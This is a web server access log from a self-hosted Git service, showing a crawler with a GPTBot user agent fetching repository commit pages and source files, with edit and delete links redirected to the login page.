"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:16:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:16:10:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:16:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:16:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" -[17/Feb/2026:16:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 11304] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore" [Client 74.7.227.38] [Length 11332] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:16:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15562] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" -[17/Feb/2026:16:10:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/status.json" -[17/Feb/2026:16:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/status.json" -[17/Feb/2026:16:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8484] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostissues&state=closed" -[17/Feb/2026:16:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln?display=source" [Client 74.7.227.38] [Length 11712] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:16:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fvite.config.ts" [Client 74.7.227.38] [Length 23710] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" -[17/Feb/2026:16:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore?display=source" [Client 74.7.227.38] [Length 12040] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" -[17/Feb/2026:16:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11371] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:16:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:16:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf?display=source" [Client 74.7.227.38] [Length 11979] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" -[17/Feb/2026:16:10:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.gitignore" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:16:10:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:16:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.gitignore" -[17/Feb/2026:16:10:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:16:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.gitignore" -[17/Feb/2026:16:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.gitignore" [Client 74.7.227.38] [Length 10414] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" -[17/Feb/2026:16:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 10373] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:10:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:16:10:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 